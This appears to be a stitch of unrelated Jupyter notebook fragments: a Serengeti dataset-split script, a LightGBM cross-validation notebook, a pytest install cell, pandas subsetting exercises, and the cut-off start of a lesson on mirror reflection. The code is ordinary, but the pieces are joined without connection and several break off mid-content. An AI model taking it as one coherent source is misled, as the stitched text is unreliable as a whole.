pd.crosstab(instances.category, instances.split)
ss_path = '/data/fagner/coruja/datasets/serengeti/serengeti_600x1024/'
all_images_download = [value['image_path_rel']
                       for key, value in instances.iterrows()
                       if os.path.isfile(ss_path + value['image_path_rel'])]
instances = instances[instances.image_path_rel.isin(all_images_download)].copy()
len(instances)
save_split(instances, 'train', 'image_path_rel', 'category', '../data/ss_time_%s_empty.csv')
save_split(instances, 'val_dev', 'image_path_rel', 'category', '../data/ss_time_%s_empty.csv')
save_split(instances, 'val', 'image_path_rel', 'category', '../data/ss_time_%s_empty.csv')
save_split(instances, 'train', 'image_path_rel', 'question__species', '../data/ss_time_%s_species.csv')
save_split(instances, 'val_dev', 'image_path_rel', 'question__species', '../data/ss_time_%s_species.csv')
save_split(instances, 'val', 'image_path_rel', 'question__species', '../data/ss_time_%s_species.csv')
# Downsample the empty class so it matches the number of non-empty training rows
train_empty_sample = instances[(instances.split == 'train') & (instances.category == 0)].sample(516635).copy()
instances_bal = pd.concat([train_empty_sample,
instances[(instances.split == 'train') & (instances.category == 1)]])
save_split(instances_bal, 'train', 'image_path_rel', 'category', '../data/ss_time_%s_empty_bal.csv')
###Output
_____no_output_____ |
analysis/6.4_LightGBM API (not scikit-learn).ipynb | ###Markdown
Using LightGBM as designed (not through sklearn API) Automatically Encode Categorical Columns I've been encoding the geo_level columns as numeric this whole time. Can it perform better by using categorical columns? LGBM can handle categorical features directly. No need to OHE them. But they must be ints. 1. Load in X 2. Label encode all the categorical features - All `object` dtypes are categorical and need to be LabelEncoded
###Code
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
import pickle
import lightgbm as lgb
from pathlib import Path
### USE FOR LOCAL JUPYTER NOTEBOOKS ###
DOWNLOAD_DIR = Path('../download')
DATA_DIR = Path('../data')
SUBMISSIONS_DIR = Path('../submissions')
MODEL_DIR = Path('../models')
#######################################
X = pd.read_csv(DOWNLOAD_DIR / 'train_values.csv', index_col='building_id')
categorical_columns = X.select_dtypes(include='object').columns
bool_columns = [col for col in X.columns if col.startswith('has')]
X_test = pd.read_csv(DOWNLOAD_DIR / 'test_values.csv', index_col='building_id')
y = pd.read_csv(DOWNLOAD_DIR / 'train_labels.csv', index_col='building_id')
sns.set()
from sklearn.preprocessing import OrdinalEncoder, LabelEncoder
from sklearn.compose import ColumnTransformer
label_enc = LabelEncoder()
t = [('ord_encoder', OrdinalEncoder(dtype=int), categorical_columns)]
ct = ColumnTransformer(transformers=t, remainder='passthrough')
X_all_ints = ct.fit_transform(X)
y = label_enc.fit_transform(np.ravel(y))  # np.ravel flattens the (n, 1) labels DataFrame to a 1D array
# Note that append for pandas objects works differently to append with
# python objects e.g. python append modifes the list in-place
# pandas append returns a new object, leaving the original unmodified
not_categorical_columns = X.select_dtypes(exclude='object').columns
cols_ordered_after_ordinal_encoding = categorical_columns.append(not_categorical_columns)
cols_ordered_after_ordinal_encoding
geo_cols = pd.Index(['geo_level_1_id', 'geo_level_2_id', 'geo_level_3_id'])
cat_cols_plus_geo = categorical_columns.append(geo_cols)
list(cat_cols_plus_geo)
train_data = lgb.Dataset(X_all_ints, label=y, feature_name=list(cols_ordered_after_ordinal_encoding),
categorical_feature=list(cat_cols_plus_geo))
# train_data = lgb.Dataset(X_all_ints, label=y)
# Placeholder left over from the LightGBM docs -- 'validation.svm' is never created or used in this notebook
# validation_data = lgb.Dataset('validation.svm', reference=train_data)
###Output
_____no_output_____
###Markdown
After reading through the docs for [lgb.train](https://lightgbm.readthedocs.io/en/latest/pythonapi/lightgbm.train.html) and [lgb.cv](https://lightgbm.readthedocs.io/en/latest/pythonapi/lightgbm.cv.html), I had to make a separate function `get_ith_pred` and then call that repeatedly within `lgb_f1_micro`. The function's docstring explains how it works. I have used the same argument names as in the LightGBM docs. This can work for any number of classes but does not work for binary classification. In the binary case, `preds` is a 1D array containing the probability of the positive class (it does not contain groups).
###Code
# Taken from the docs for lgb.train and lgb.cv
# Helpful Stackoverflow answer:
# https://stackoverflow.com/questions/50931168/f1-score-metric-in-lightgbm
from sklearn.metrics import f1_score
def get_ith_pred(preds, i, num_data, num_class):
"""
preds: 1D NumPY array
A 1D numpy array containing predicted probabilities. Has shape
(num_data * num_class,). So, For binary classification with
100 rows of data in your training set, preds is shape (200,),
i.e. (100 * 2,).
i: int
The row/sample in your training data you wish to calculate
the prediction for.
num_data: int
The number of rows/samples in your training data
num_class: int
The number of classes in your classification task.
Must be greater than 2.
LightGBM docs tell us that to get the probability of class 0 for
the 5th row of the dataset we do preds[0 * num_data + 5].
For class 1 prediction of 7th row, do preds[1 * num_data + 7].
sklearn's f1_score(y_true, y_pred) expects y_pred to be of the form
[0, 1, 1, 1, 1, 0...] and not probabilities.
This function translates preds into the form sklearn's f1_score
understands.
"""
# Does not work for binary classification, preds has a different form
# in that case
    assert num_class > 2
preds_for_ith_row = [preds[class_label * num_data + i]
for class_label in range(num_class)]
# The element with the highest probability is predicted
return np.argmax(preds_for_ith_row)
def lgb_f1_micro(preds, train_data):
y_true = train_data.get_label()
num_data = len(y_true)
num_class = 3
y_pred = []
for i in range(num_data):
ith_pred = get_ith_pred(preds, i, num_data, num_class)
y_pred.append(ith_pred)
return 'f1', f1_score(y_true, y_pred, average='micro'), True
probs = [[.12, 0.18, 0.7],
[0.2, 0.5, 0.3]]
[np.argmax(p) for p in probs]
param = {'num_leaves': 120,
# 'num_iterations': 240,
'min_child_samples': 40,
'learning_rate': 0.2,
'boosting_type': 'goss',
'objective': 'multiclass',
'num_class': 3}
# LGBM seem to hate using plurals. Why???
num_round = 10
evals_result = {}
booster = lgb.train(param, train_data, num_round,
categorical_feature=list(cat_cols_plus_geo),
feval=lgb_f1_micro, evals_result=evals_result)
evals_result
lgb.plot_metric(evals_result)
booster.feature_importance()
# LGBM seem to hate using plurals. Why???
num_boost_round = 100
cv_results = lgb.cv(param, train_data, num_boost_round, nfold=5,
categorical_feature=list(cat_cols_plus_geo),
feval=lgb_f1_micro)
cv_results.keys()
plt.plot(cv_results['f1-mean'])
f1_mean = cv_results['f1-mean']
max(f1_mean)
np.argmax(f1_mean)
len(f1_mean[20:35])
plt.plot(range(20, 35), f1_mean[20:35])
plt.xticks()
plt.show()
evals_result = {}
booster = lgb.train(param,
train_data,
28,
# valid_sets=[validation_data],
categorical_feature=list(cat_cols_plus_geo),
feval=lgb_f1_micro,
evals_result=evals_result)
# early_stopping_rounds=5)
booster.feature_importance()
data = {'name': booster.feature_name(),
'importance': booster.feature_importance()}
df_booster = pd.DataFrame(data)
df_booster
###Output
_____no_output_____
###Markdown
Submit this new model This model with the native LightGBM API looks like an improvement over the sklearn implementation. Let's give it a whirl!
###Code
def make_submission_lgbm_api(booster, ct, title):
"""
ct: ColumnTransformer
The ColumnTransformer class already fit to X_train to label encode
the features
label_enc: LabelEncoder
The LabelEncoder used to transform y to [0, 1, 2]
"""
X_test = pd.read_csv(DOWNLOAD_DIR / 'test_values.csv',
index_col='building_id')
X_test_ints = ct.transform(X_test)
prediction_probabilities = booster.predict(X_test_ints)
# Shift by 1 as submission is in format [1, 2, 3]
predictions = [np.argmax(p) + 1 for p in prediction_probabilities]
sub_format = pd.read_csv(DOWNLOAD_DIR / 'submission_format.csv',
index_col='building_id')
my_sub = pd.DataFrame(data=predictions,
columns=sub_format.columns,
index=sub_format.index)
my_sub.to_csv(SUBMISSIONS_DIR / f'{title}.csv')
title = '02-26 LightGBM API - All features - 28 rounds - cat+geo are cat features'
make_submission_lgbm_api(booster, ct, title)
###Output
_____no_output_____
###Markdown
Woop! That scored 0.7446 (with a CV score of 0.7446) and pushed me up 100 places to 227. Let's remove some unimportant features.
###Code
df_booster
with open(DATA_DIR / 'df_feature_importance_lgbm_api.pkl', 'wb') as f:
pickle.dump(df_booster, f)
with open(DATA_DIR / 'df_feature_importance_lgbm_api.pkl', 'rb') as f:
a = pickle.load(f)
with open(DATA_DIR / 'cat_cols_plus_geo.pkl', 'wb') as f:
pickle.dump(cat_cols_plus_geo, f)
###Output
_____no_output_____
###Markdown
We now want to test which features give the best performance and then submit the best one(s): 1. fi > 0, 2. fi > 10, 3. fi > 20, 4. fi > 50, 5. fi > 70, 6. fi > 100, 7. fi > 200, 8. fi > 500, 9. fi > 800, 10. fi > 1000
###Code
# These are the features we want to include
keep = df_booster[df_booster.importance > 500].name.values
keep
test = list(cols_ordered_after_ordinal_encoding)
test
def cv_with_fi_range(keep_features=-1, num_boost_round=50):
"""
Perform cv with native LightGBM API
    keep_features: int
Keep features with feature importance greater than this value.
Default: -1 to keep all features
"""
X_train = pd.read_csv(DOWNLOAD_DIR / 'train_values.csv',
index_col='building_id')
y_train = pd.read_csv(DOWNLOAD_DIR / 'train_labels.csv',
index_col='building_id')
# Must ordinal encode the categorical columns for LGBM to work
    categorical_columns = X_train.select_dtypes(include='object').columns
    t = [('ord_encoder', OrdinalEncoder(dtype=int), categorical_columns)]
    ct = ColumnTransformer(transformers=t, remainder='passthrough')
    X_train_ints = ct.fit_transform(X_train)
    # Must label encode y (LGBM expects [0, 1, 2] as classes)
    label_enc = LabelEncoder()
    y_train = label_enc.fit_transform(np.ravel(y_train))
    non_cat_cols = X_train.select_dtypes(exclude='object').columns
cols_after_ord_encoding = categorical_columns.append(non_cat_cols)
# Turn into DF
df_ints = pd.DataFrame(data=X_train_ints,
columns=cols_after_ord_encoding)
with open(DATA_DIR / 'df_feature_importance_lgbm_api.pkl', 'rb') as f:
df_feature_importance = pickle.load(f)
# Only keep features with FI > keep_features
mask = df_feature_importance.importance > keep_features
features_to_use = df_feature_importance[mask].name.values
X_train_kept_features = df_ints[features_to_use]
feature_names = list(df_ints[features_to_use].columns)
# Need this to check which columns remain are categorical
with open(DATA_DIR / 'cat_cols_plus_geo.pkl', 'rb') as f:
cat_cols_plus_geo = pickle.load(f)
# Create list of categorical features
categorical_features = []
for feature in feature_names:
if feature in cat_cols_plus_geo:
categorical_features.append(feature)
train_dataset = lgb.Dataset(X_train_kept_features,
label=y_train,
feature_name=feature_names,
categorical_feature=categorical_features)
param = {'num_leaves': 120,
# 'num_iterations': 240,
'min_child_samples': 40,
'learning_rate': 0.2,
'boosting_type': 'goss',
'objective': 'multiclass',
'num_class': 3}
cv_results = lgb.cv(param,
train_dataset,
num_boost_round,
nfold=5,
categorical_feature=categorical_features,
feval=lgb_f1_micro)
f1_mean = cv_results['f1-mean']
fig, ax = plt.subplots()
ax.plot(f1_mean)
title = f'F1-score kept features above {keep_features} feature importance'
ax.set(title=title,
xlabel='Boosting round',
ylabel='f1-score (micro)')
plt.show()
print(f'RESULTS KEEPING FEATURES > {keep_features} FEATURE IMPORTANCE')
print('Best f1 score: ', max(f1_mean))
print('Best f1 score iteration:', np.argmax(f1_mean))
###Output
_____no_output_____
###Markdown
TL;DR Keeping features above feature importance 20 gives the best results: 0.7448 (in comparison to 0.7446 with all features). Do 26 iterations.
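Below is a minimal sketch of training that final model on the reduced feature set (assuming `df_booster`, `X_all_ints`, `y`, `param`, `cols_ordered_after_ordinal_encoding` and `cat_cols_plus_geo` from the earlier cells; `final_booster` is a name introduced here):
###Code
# Sketch: keep features with importance > 20 and train for 26 rounds
keep_cols = df_booster[df_booster.importance > 20]['name'].tolist()
keep_cats = [c for c in keep_cols if c in list(cat_cols_plus_geo)]

df_ints = pd.DataFrame(X_all_ints, columns=cols_ordered_after_ordinal_encoding)
final_dataset = lgb.Dataset(df_ints[keep_cols], label=y,
                            feature_name=keep_cols,
                            categorical_feature=keep_cats)
final_booster = lgb.train(param, final_dataset, 26,
                          categorical_feature=keep_cats)
###Output
_____no_output_____
###Markdown
The CV runs behind that TL;DR: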
###Code
cv_with_fi_range(-1)
cv_with_fi_range(0)
cv_with_fi_range(10)
cv_with_fi_range(20)
cv_with_fi_range(50)
cv_with_fi_range(70)
cv_with_fi_range(100)
cv_with_fi_range(200)
cv_with_fi_range(500)
cv_with_fi_range(800)
cv_with_fi_range(1000)
###Output
[LightGBM] [Warning] Auto-choosing col-wise multi-threading, the overhead of testing was 0.001996 seconds.
You can set `force_col_wise=true` to remove the overhead.
[LightGBM] [Info] Total Bins 10528
[LightGBM] [Info] Number of data points in the train set: 208480, number of used features: 2
[LightGBM] [Info] Using GOSS
[LightGBM] [Warning] Auto-choosing col-wise multi-threading, the overhead of testing was 0.002865 seconds.
You can set `force_col_wise=true` to remove the overhead.
[LightGBM] [Info] Total Bins 10528
[LightGBM] [Info] Number of data points in the train set: 208481, number of used features: 2
[LightGBM] [Info] Using GOSS
[LightGBM] [Warning] Auto-choosing col-wise multi-threading, the overhead of testing was 0.002405 seconds.
You can set `force_col_wise=true` to remove the overhead.
[LightGBM] [Info] Total Bins 10528
[LightGBM] [Info] Number of data points in the train set: 208481, number of used features: 2
[LightGBM] [Info] Using GOSS
[LightGBM] [Warning] Auto-choosing row-wise multi-threading, the overhead of testing was 0.000522 seconds.
You can set `force_row_wise=true` to remove the overhead.
And if memory is not enough, you can set `force_col_wise=true`.
[LightGBM] [Info] Total Bins 10528
[LightGBM] [Info] Number of data points in the train set: 208481, number of used features: 2
[LightGBM] [Info] Using GOSS
[LightGBM] [Warning] Auto-choosing row-wise multi-threading, the overhead of testing was 0.000539 seconds.
You can set `force_row_wise=true` to remove the overhead.
And if memory is not enough, you can set `force_col_wise=true`.
[LightGBM] [Info] Total Bins 10528
[LightGBM] [Info] Number of data points in the train set: 208481, number of used features: 2
[LightGBM] [Info] Using GOSS
[LightGBM] [Info] Start training from score -2.339173
[LightGBM] [Info] Start training from score -0.564028
[LightGBM] [Info] Start training from score -1.094582
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Info] Start training from score -2.339128
[LightGBM] [Info] Start training from score -0.564032
[LightGBM] [Info] Start training from score -1.094586
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Info] Start training from score -2.339178
[LightGBM] [Info] Start training from score -0.564024
[LightGBM] [Info] Start training from score -1.094586
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Info] Start training from score -2.339178
[LightGBM] [Info] Start training from score -0.564032
[LightGBM] [Info] Start training from score -1.094572
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Info] Start training from score -2.339178
[LightGBM] [Info] Start training from score -0.564032
[LightGBM] [Info] Start training from score -1.094572
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
[LightGBM] [Warning] No further splits with positive gain, best gain: -inf
|
novice/02-02/Latihan 02-02.ipynb | ###Markdown
PyTest Installation reference: https://docs.pytest.org/en/6.2.x/getting-started.html Full reading on pytest: https://docs.pytest.org/en/6.2.x/
###Code
pip install -U pytest
###Output
Requirement already satisfied: pytest in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (6.2.5)
Requirement already satisfied: atomicwrites>=1.0 in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (1.4.0)Note: you may need to restart the kernel to use updated packages.
Requirement already satisfied: py>=1.8.2 in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (1.11.0)
Requirement already satisfied: iniconfig in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (1.1.1)
Requirement already satisfied: packaging in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (21.3)
Requirement already satisfied: attrs>=19.2.0 in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (21.4.0)
Requirement already satisfied: pluggy<2.0,>=0.12 in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (1.0.0)
Requirement already satisfied: toml in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (0.10.2)
Requirement already satisfied: colorama in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from pytest) (0.4.4)
Requirement already satisfied: pyparsing!=3.0.5,>=2.0.2 in c:\users\evangs mailoa\appdata\local\programs\python\python39\lib\site-packages (from packaging->pytest) (3.0.6)
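###Markdown
As a minimal sketch of how pytest is used, assume the cell below is saved as `test_sample.py` and run with `pytest` from the command line (`inc` is just an illustrative function):
###Code
# test_sample.py -- pytest discovers functions whose names start with test_
def inc(x):
    return x + 1

def test_inc():
    assert inc(3) == 4
###Output
_____no_output_____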
|
module-2/lab-subsetting-and-descriptive-stats/your-code/W4-Subsetting and Descriptive Stats_solution.ipynb | ###Markdown
Import all the libraries that are necessary
###Code
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
###Output
_____no_output_____
###Markdown
Challenge 1 In this challenge we will use the `Temp_States.csv` file. First import it into a data frame called `Temp`.
###Code
Temp = pd.read_csv('Temp_States.csv')
Temp
###Output
_____no_output_____
###Markdown
Explore the data types of the Temp dataframe. What type of data do we have? Comment your result.
###Code
Temp.dtypes
###Output
_____no_output_____
###Markdown
Select the rows where state is New York
###Code
Temp.loc[Temp.State=='New York']
###Output
_____no_output_____
###Markdown
What is the average of the temperature of cities in New York?
###Code
Temp.loc[Temp.State=='New York'].mean()
###Output
_____no_output_____
###Markdown
We want to know the cities and states with a temperature above 15 degrees Celsius
###Code
Temp.loc[Temp['Temperature']>15]
###Output
_____no_output_____
###Markdown
Now, return only the cities that have a temperature above 15 degrees Celsius
###Code
Temp['City'].loc[Temp['Temperature']>15]
###Output
_____no_output_____
###Markdown
We want to know which cities have a temperature above 15 degrees Celsius and below 20 degrees Celsius. *Hint: First write the condition, then select the rows.*
###Code
Temp[(Temp['Temperature'] > 15) & (Temp['Temperature'] < 20)]
###Output
_____no_output_____
###Markdown
Find the mean and the standard deviation of the temperature of each state. *Hint: Use functions from the Data Manipulation lesson.*
###Code
Temp.groupby('State').agg(['mean', 'std'])
###Output
_____no_output_____
###Markdown
Challenge 2 Load the `employee.csv` file into a DataFrame. Call the dataframe `employee`
###Code
employee= pd.read_csv('Employee.csv')
###Output
_____no_output_____
###Markdown
Explore the data types of the `employee` dataframe. Comment your results.
###Code
employee.dtypes
###Output
_____no_output_____
###Markdown
Visually show the frequency distribution (histogram) of the employee dataset. In a few words, describe these histograms.
###Code
employee.hist(bins=20)
###Output
_____no_output_____
###Markdown
What's the average salary in this company?
###Code
employee.Salary.mean()
###Output
_____no_output_____
###Markdown
What's the highest salary?
###Code
employee.Salary.max()
###Output
_____no_output_____
###Markdown
What's the lowest salary?
###Code
employee.Salary.min()
###Output
_____no_output_____
###Markdown
Who are the employees with the lowest salary?
###Code
employee.loc[employee['Salary']==employee.Salary.min()]
###Output
_____no_output_____
###Markdown
Could you give all the information about an employee called David?
###Code
employee.loc[employee['Name']=='David']
###Output
_____no_output_____
###Markdown
Could you give only David's salary?
###Code
employee.loc[employee['Name']=='David']['Salary']
###Output
_____no_output_____
###Markdown
Print all the rows where job title is associate
###Code
employee.loc[employee['Title']=='associate']
###Output
_____no_output_____
###Markdown
Print the first 3 rows of your dataframe. Tip: there are 2 ways to do it; do it both ways.
###Code
employee.iloc[:3]
employee[:3]
###Output
_____no_output_____
###Markdown
Find the employees whose title is associate and whose salary is above 55.
###Code
employee.loc[(employee.Salary>55) & (employee.Title=='associate')]
###Output
_____no_output_____
###Markdown
Group the employees based on their number of years of employment. What are the average salaries in each group?
###Code
employee.groupby('Years').mean()['Salary']
###Output
_____no_output_____
###Markdown
What is the average Salary per title?
###Code
employee.groupby('Title').mean()
###Output
_____no_output_____
###Markdown
Show a visual summary of the data using a boxplot. What are the first and third quartiles? Comment your results. *Hint: Quantiles vs Quartiles* - `In Probability and Statistics, quantiles are cut points dividing the range of a probability distribution into continuous intervals with equal probabilities. When the division is into four parts, the values of the variate corresponding to 25%, 50% and 75% of the total distribution are called quartiles.`
###Code
employee.boxplot()
employee.quantile(0.25)
employee.quantile(0.75)
###Output
_____no_output_____
###Markdown
Is the mean salary per gender different?
###Code
employee.groupby(['Gender']).mean()
###Output
_____no_output_____
###Markdown
Find the minimum, mean and the maximum of all numeric columns for each Department. Hint: Use functions from Data Manipulation lesson
###Code
employee.groupby('Department').agg(['min','max','mean'])
###Output
_____no_output_____
###Markdown
Bonus Question For each department, compute the difference between the maximal salary and the minimal salary. * Hint: try using `agg` or `apply` and `lambda`*
###Code
employee.groupby('Department')[['Salary']].agg(lambda x: x.max()- x.min())
###Output
_____no_output_____
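###Markdown
The same result can be obtained with `apply`, the other approach mentioned in the hint (an equivalent sketch):
###Code
# Equivalent: apply a lambda to each department's Salary column
employee.groupby('Department')['Salary'].apply(lambda x: x.max() - x.min())
###Output
_____no_output_____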
###Markdown
Challenge 3 Open the Orders.csv dataset. Name your dataset orders
###Code
orders= pd.read_csv('Orders.csv')
###Output
_____no_output_____
###Markdown
Explore your dataset by looking at the data types and the summary statistics. Comment your results
###Code
orders.dtypes
orders.describe()
###Output
_____no_output_____
###Markdown
What is the average Purchase Price?
###Code
orders['amount_spent'].mean()
###Output
_____no_output_____
###Markdown
What were the highest and lowest purchase prices?
###Code
orders['amount_spent'].min()
orders['amount_spent'].max()
###Output
_____no_output_____
###Markdown
Select all the customers we have in Spain
###Code
orders.loc[orders.Country=='Spain']
###Output
_____no_output_____
###Markdown
How many customers do we have in Spain? Hint: Use value_counts()
###Code
orders.loc[orders.Country=='Spain']['Country'].value_counts()
###Output
_____no_output_____
###Markdown
Select all the customers who have bought more than 50 items.
###Code
orders.loc[orders.Quantity>50]
###Output
_____no_output_____
###Markdown
Select orders from Spain that are above 50 items
###Code
orders.loc[(orders.Quantity>50) & (orders.Country=='Spain')]
###Output
_____no_output_____
###Markdown
Select all free orders
###Code
orders.loc[orders.amount_spent==0]
###Output
_____no_output_____
###Markdown
Select all orders that are 'lunch bag' Hint: Use string functions
###Code
orders.loc[orders.Description.str.startswith('lunch bag')]
###Output
_____no_output_____
###Markdown
Select all orders that are made in 2011 and are 'lunch bag'
###Code
orders.loc[(orders.Description.str.startswith('lunch bag')) & (orders.year==2011)]
###Output
_____no_output_____
###Markdown
Show the frequency distribution of the amount spent in Spain.
###Code
orders.loc[orders.Country=='Spain']['amount_spent'].hist(bins=50)
###Output
_____no_output_____
###Markdown
Select all orders made in the month of August
###Code
orders.loc[orders.month==8]
###Output
_____no_output_____
###Markdown
Count how many orders were made by each country in the month of August. Hint: Use value_counts()
###Code
orders.loc[orders.month==8]['Country'].value_counts()
###Output
_____no_output_____
###Markdown
What's the average amount of money spent by country?
###Code
orders.groupby('Country').mean()['amount_spent']
###Output
_____no_output_____
###Markdown
What's the most expensive item?
###Code
orders.loc[orders.amount_spent==orders.amount_spent.max()]
###Output
_____no_output_____
###Markdown
What was the average amount spent per year?
###Code
orders.groupby('year').mean()
###Output
_____no_output_____ |
_build/html/_sources/curriculum-notebooks/Science/ReflectionsOfLightByPlaneAndSphericalMirrors/reflections-of-light-by-plane-and-spherical-mirrors.ipynb | ###Markdown

###Code
from IPython.display import display, Math, Latex, HTML
HTML('''<script>
function code_toggle() {
if (code_shown){
$('div.input').hide('500');
$('#toggleButton').val('Show Code')
} else {
$('div.input').show('500');
$('#toggleButton').val('Hide Code')
}
code_shown = !code_shown
}
$( document ).ready(function(){
code_shown=false;
$('div.input').hide()
});
</script>
<form action="javascript:code_toggle()"><input type="submit" id="toggleButton" value="Show Code"></form>''')
from helper import *
%matplotlib inline
###Output
_____no_output_____
###Markdown
Reflection of Light by Plane and Spherical Mirrors Introduction When light shines onto the surface of an object, some of the light is reflected, while the rest is either absorbed or transmitted. We can imagine the light consisting of many narrow beams that travel in straight-line paths called **rays**. The light rays that strike the surface are called the **incident rays**. The light rays that reflect off the surface are called the **reflected rays**. This model of light is called the **ray model**, and it can be used to describe many aspects of light, including the reflection and formation of images by plane and spherical mirrors. Law of Reflection To measure the angles of the incident and reflected rays, we first draw the **normal**, which is the line perpendicular to the surface. The **angle of incidence, $\theta_{i}$,** is the angle between the incident ray and the normal. Likewise, the **angle of reflection, $\theta_{r}$,** is the angle between the reflected ray and the normal. The incident ray, the reflected ray, and the normal to the reflecting surface all lie within the same plane. This is shown in the figure above. Notice that the angle of reflection is equal to the angle of incidence. This is known as the **law of reflection**, and it can be expressed by the following equation: $$\theta_{r} = \theta_{i}$$ Use the slider below to change the angle of incidence. This changes the angle between the incident ray and the normal. Notice how the angle of reflection also changes when the slider is moved.
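For example, if a light ray strikes a mirror at an angle of incidence of $30^{\circ}$, then the reflected ray leaves the surface at an angle of reflection of $30^{\circ}$ on the other side of the normal.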
###Code
interactive_plot = widgets.interactive(f, Angle=widgets.IntSlider(value=45,min=0,max=90,step=15,continuous_update=False))
output = interactive_plot.children[-1]
output.layout.height = '280px'
interactive_plot
###Output
_____no_output_____
###Markdown
**Question:** *When the angle of incidence increases, what happens to the angle of reflection?*
###Code
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = "The angle of reflection increases."
option_2 = "The angle of reflection decreases."
option_3 = "The angle of reflection remains constant."
option_4 = "The angle of reflection equals zero."
multiple_choice(option_1, option_2, option_3, option_4)
###Output
[1m(A) [0;0mThe angle of reflection decreases.
[1m(B) [0;0mThe angle of reflection remains constant.
[1m(C) [0;0mThe angle of reflection equals zero.
[1m(D) [0;0mThe angle of reflection increases.
###Markdown
Specular and Diffuse Reflections For a very smooth surface, such as a mirror, almost all of the light is reflected to produce a **specular reflection**. In a specular reflection, the reflected light rays are parallel to one another and point in the same direction. This allows specular reflections to form images. If the surface is not very smooth, then the light may bounce off of the surface in various directions. This produces a **diffuse reflection**. Diffuse reflections cannot form images. **Note:** The law of reflection still applies to diffuse reflections, even though the reflected rays are pointing in various directions. We can imagine that each small section of the rough surface is like a flat plane orientated differently than the sections around it. Since each of these sections is orientated differently, the angle of incidence is different at each section. This causes the reflected rays to scatter. **Question:** *Which of the following is an example of a specular reflection?*
###Code
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = "The reflection off a clean window."
option_2 = "The reflection off a wooden deck."
option_3 = "The reflection off a carpet floor."
option_4 = "The reflection off a table cloth."
multiple_choice(option_1, option_2, option_3, option_4)
###Output
[1m(A) [0;0mThe reflection off a wooden deck.
[1m(B) [0;0mThe reflection off a clean window.
[1m(C) [0;0mThe reflection off a carpet floor.
[1m(D) [0;0mThe reflection off a table cloth.
###Markdown
**Question:** *Which of the following is an example of a diffuse reflection?*
###Code
#Assign each multiple choice to these four variables
#Option_1 contains the answer
option_1 = "The reflection off a concrete sidewalk."
option_2 = "The reflection off a mirror."
option_3 = "The reflection off the surface of a still lake."
option_4 = "The reflection off a polished sheet of metal."
multiple_choice(option_1, option_2, option_3, option_4)
###Output
[1m(A) [0;0mThe reflection off the surface of a still lake.
[1m(B) [0;0mThe reflection off a polished sheet of metal.
[1m(C) [0;0mThe reflection off a concrete sidewalk.
[1m(D) [0;0mThe reflection off a mirror.
###Markdown
Image Formation by Plane Mirrors A **plane mirror** is simply a mirror made from a flat (or planar) surface. These types of mirrors are commonly found in bedroom or bathroom fixtures. When an object is reflected in a plane mirror, the image of the object appears to be located behind the mirror. This is because our brains interpret the reflected light rays entering our eyes as having travelled in straight-line paths. The light rays entering our eyes simply do not contain enough information for our brains to differentiate between a straight-line path and a path that changed direction due to a reflection. Notice in the figure above that the light rays do not actually converge at the location where the image appears to be formed (behind the mirror). Since the light rays do not actually go behind the mirror, they are represented as projections using dashed lines. If a film were placed at the image location behind the mirror, it would not be able to capture the image. As a result, this type of image is called a **virtual image**. For objects reflected in a plane mirror, the distance of the image from the mirror, $d_{i}$, is always equal to the distance of the object from the mirror, $d_{o}$. If the object is moved toward 